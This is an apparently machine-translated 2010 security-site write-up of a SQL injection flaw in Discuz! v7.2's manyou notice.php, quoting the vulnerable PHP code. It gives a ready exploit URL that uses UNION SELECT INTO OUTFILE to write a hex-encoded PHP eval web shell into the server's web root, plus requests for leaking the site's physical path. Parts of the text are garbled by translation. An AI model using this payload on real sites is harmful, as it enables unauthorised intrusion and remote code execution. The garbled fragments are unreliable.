Discuz! v7. 2 injection vulnerability analysis and exploit-vulnerability warning-the black bar safety net

2010-03-11T00:00:00
ID MYHACK58:62201026392
Type myhack58
Reporter 佚名
Modified 2010-03-11T00:00:00

Description

Vulnerability analysis: 文件 ./manyou/sources/notice.php

The relevant code:

if($option == 'del') { $appid = intval($_GET['appid']); $db->query("DELETE FROM {$tablepre}myinvite WHERE appid='$appid' AND touid='$discuz_uid'"); showmessage('manyou:done', 'userapp. php? script=notice&action=invite'); } elseif($option == 'deluserapp') { $hash = trim($_GET['hash']); //here and not filtered, a direct result of the injection of produced if($action == 'invite') { $query = $db->query("SELECT * FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'"); if($value = $db->fetch_array($query)) { $db->query("DELETE FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'"); showmessage('manyou:done', 'userapp. php? script=notice&action=invite'); } else { showmessage('manyou:noperm'); } } else { $db->query("DELETE FROM {$tablepre}mynotice WHERE id='$hash' AND uid='$discuz_uid'"); showmessage('manyou:done', 'userapp. php? script=notice'); } }

Very simple a vulnerability. In the absence of the query results are returned in the case we tend to only take a blind way, but if the current database account have File_priv we can also directly into the outfile to.

/userapp. php? script=notice&view=all&option=deluserapp&action=invite&hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504f53545b274f275d293b3f3e,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%2 3

al($_POST['O']);?& gt;hexadecimal representation.

But want to

into outfile, then we also have to have the web to physical path, which in php's case is not rare.

/manyou/admincp. php? my_suffix=%0A%0DTOBY57

! Discuz! v7. 2 injection vulnerability analysis with the use of (- Minghacker - Minghackers listen to the rain court

/manyou/userapp. php?% 0D%0A=TOBY57

! Discuz! v7. 2 injection vulnerability analysis with the use of (- Minghacker - Minghackers listen to the rain court

This thing has, the only difference between the outfile.